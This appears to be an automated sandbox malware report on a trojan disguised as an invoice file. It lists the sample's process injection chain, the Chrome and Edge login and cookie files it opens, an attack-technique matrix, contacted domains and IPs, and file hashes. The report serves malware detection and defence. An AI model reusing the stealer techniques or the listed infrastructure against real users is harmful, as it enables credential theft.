                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe"
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
                Source: C:\Windows\SysWOW64\xwizard.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4502564623.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000000.2275148397.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, fQbMdgFgKkVEm.exe, 00000004.00000002.4502564623.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000000.2275148397.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4502564623.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000000.2275148397.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4502564623.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000000.2275148397.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_00410D10 cpuid 0_2_00410D10
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_004711D2 GetUserNameW,0_2_004711D2
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2031582166.0000000002E51000.00000004.00000020.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000002.2042554128.0000000002E7E000.00000004.00000020.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2032492519.0000000002E7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

                Stealing of Sensitive Information

                Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2353173694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.4503127560.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2354040519.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\xwizard.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\xwizard.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\xwizard.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\xwizard.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\xwizard.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\xwizard.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\xwizard.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\xwizard.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\xwizard.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | Binary or memory string: WIN_XP
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | Binary or memory string: WIN_XPe
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | Binary or memory string: WIN_VISTA
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | Binary or memory string: WIN_7

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2353173694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.4503127560.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2354040519.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
                | Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 251 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 312 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 312 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                [Behavior graph. ID: 1572490; Sample: Outstanding Invoices Spread...; Startdate: 10/12/2024; Architecture: WINDOWS; Score: 100. Process chain: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe -> svchost.exe (started) -> fQbMdgFgKkVEm.exe (injected) -> xwizard.exe (started) -> firefox.exe (started)]

                | Source | Detection | Scanner | Label | Link |
                |---|---|---|---|---|
                | Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | 39% | ReversingLabs | Win32.Trojan.Swotter | |
                | Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | 100% | Joe Sandbox ML | | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                                                                            197695AS-REGRUtrue
                                                                            45.79.252.94
                                                                            www.premium303max.restUnited States
                                                                            63949LINODE-APLinodeLLCUStrue
                                                                            203.161.49.193
                                                                            www.eco-tops.websiteMalaysia
                                                                            45899VNPT-AS-VNVNPTCorpVNtrue
                                                                            23.167.152.41
                                                                            gtml.huksa.huhusddfnsuegcdn.comReserved
                                                                            395774ESVC-ASNUSfalse
                                                                            178.79.184.196
                                                                            gucciqueen.shopUnited Kingdom
                                                                            63949LINODE-APLinodeLLCUStrue
                                                                            180.178.39.236
                                                                            www.73613.shopHong Kong
                                                                            45753NETSEC-HKNETSECHKtrue
                                                                            74.48.34.43
                                                                            cn-hk2.rvh2.raincs.cnCanada
                                                                            14663TELUS-3CAtrue
                                                                            3.33.130.190
                                                                            binacamasala.comUnited States
                                                                            8987AMAZONEXPANSIONGBtrue
                                                                            216.40.34.41
                                                                            www.newhopetoday.appCanada
                                                                            15348TUCOWSCAtrue
                                                                            46.38.243.234
                                                                            dlion.netGermany
                                                                            197540NETCUP-ASnetcupGmbHDEtrue
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1572490
                                                                            Start date and time:2024-12-10 16:22:06 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 10m 42s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:7
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@17/11
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 91%
                                                                            • Number of executed functions: 41
                                                                            • Number of non-executed functions: 310
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
Time | Type | Description
10:24:06 | API Interceptor | 9951939x Sleep call for process: xwizard.exe modified
                                                                            Process:C:\Windows\SysWOW64\xwizard.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                            Category:dropped
                                                                            Size (bytes):196608
                                                                            Entropy (8bit):1.121297215059106
                                                                            Encrypted:false
                                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Process:C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):288256
                                                                            Entropy (8bit):7.995347160111417
                                                                            Encrypted:true
                                                                            SSDEEP:6144:ANciA7wpXEMdJmYbl+1QBevYXEKThUMUT89bYSEZNJTMvUrkw:ANciA7kEmJm+deveoQbx6NJ4i
                                                                            MD5:B8DE90B7E6BB7FD6B44D85AD9BA18900
                                                                            SHA1:41081986ADD03ADE6CB850D028C1127F7453AC01
                                                                            SHA-256:4FAB464FF7634E54D77D2A91976D9DEA56039AE5190CDC46C6ECD69841BA99E0
                                                                            SHA-512:B2415522B22CACEBEA1B6649287CBA06278FA5C8255C00733130654140AADC6EAF2FE72A095BC39FFF438E855C176BE1F3E1004741B964E078E0F98AF23A4887
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.219222550779852
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                            • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                            File size:983'498 bytes
                                                                            MD5:809f3ed91d34d38f0eced2a0709e22e9
                                                                            SHA1:08eddcdbf872273fffd90569024c74d99da2c6bd
                                                                            SHA256:494b4e888e21a6d9545fb434442900723eae53eb99882dfaa5f30367bf37d4c5
                                                                            SHA512:e0db21bd4c0d66de73d5c50e7c37f4dac3b621e683fcfb43e7a7f52b8257ff809933c225372a35b12d9d874c23fd57c3647d484888fcebd7160107217f24f7d1
                                                                            SSDEEP:12288:rLkcoxg7v3qnC11ErwIhh0F4qwUgUny5QLsnS59FyVmjO1A8uHKK1wkY6AQ:ffmMv6Ckr7Mny5QLsmWmjCZtKN7F
                                                                            TLSH:2225D112B7D680B6DDA339B1293BE32BEB3575194327C48B97E02E778F111409B3A761
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                            Icon Hash:1733312925935517
                                                                            Entrypoint:0x416310
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:0
                                                                            File Version Major:5
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                            Instruction
                                                                            call 00007F262CEDCB2Ch
                                                                            jmp 00007F262CED08FEh
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push edi
                                                                            push esi
                                                                            mov esi, dword ptr [ebp+0Ch]
                                                                            mov ecx, dword ptr [ebp+10h]
                                                                            mov edi, dword ptr [ebp+08h]
                                                                            mov eax, ecx
                                                                            mov edx, ecx
                                                                            add eax, esi
                                                                            cmp edi, esi
                                                                            jbe 00007F262CED0A8Ah
                                                                            cmp edi, eax
                                                                            jc 00007F262CED0C2Ah
                                                                            cmp ecx, 00000100h
                                                                            jc 00007F262CED0AA1h
                                                                            cmp dword ptr [004A94E0h], 00000000h
                                                                            je 00007F262CED0A98h
                                                                            push edi
                                                                            push esi
                                                                            and edi, 0Fh
                                                                            and esi, 0Fh
                                                                            cmp edi, esi
                                                                            pop esi
                                                                            pop edi
                                                                            jne 00007F262CED0A8Ah
                                                                            pop esi
                                                                            pop edi
                                                                            pop ebp
                                                                            jmp 00007F262CED0EEAh
                                                                            test edi, 00000003h
                                                                            jne 00007F262CED0A97h
                                                                            shr ecx, 02h
                                                                            and edx, 03h
                                                                            cmp ecx, 08h
                                                                            jc 00007F262CED0AACh
                                                                            rep movsd
                                                                            jmp dword ptr [00416494h+edx*4]
                                                                            nop
                                                                            mov eax, edi
                                                                            mov edx, 00000003h
                                                                            sub ecx, 04h
                                                                            jc 00007F262CED0A8Eh
                                                                            and eax, 03h
                                                                            add ecx, eax
                                                                            jmp dword ptr [004163A8h+eax*4]
                                                                            jmp dword ptr [004164A4h+ecx*4]
                                                                            nop
                                                                            jmp dword ptr [00416428h+ecx*4]
                                                                            nop
                                                                            mov eax, E4004163h
                                                                            arpl word ptr [ecx+00h], ax
                                                                            or byte ptr [ecx+eax*2+00h], ah
                                                                            and edx, ecx
                                                                            mov al, byte ptr [esi]
                                                                            mov byte ptr [edi], al
                                                                            mov al, byte ptr [esi+01h]
                                                                            mov byte ptr [edi+01h], al
                                                                            mov al, byte ptr [esi+02h]
                                                                            shr ecx, 02h
                                                                            mov byte ptr [edi+02h], al
                                                                            add esi, 03h
                                                                            add edi, 03h
                                                                            cmp ecx, 08h
                                                                            jc 00007F262CED0A4Eh
                                                                            Programming Language:
                                                                            • [ASM] VS2008 SP1 build 30729
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [C++] VS2008 SP1 build 30729
                                                                            • [ C ] VS2005 build 50727
                                                                            • [IMP] VS2005 build 50727
                                                                            • [ASM] VS2008 build 21022
                                                                            • [RES] VS2008 build 21022
                                                                            • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9298 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
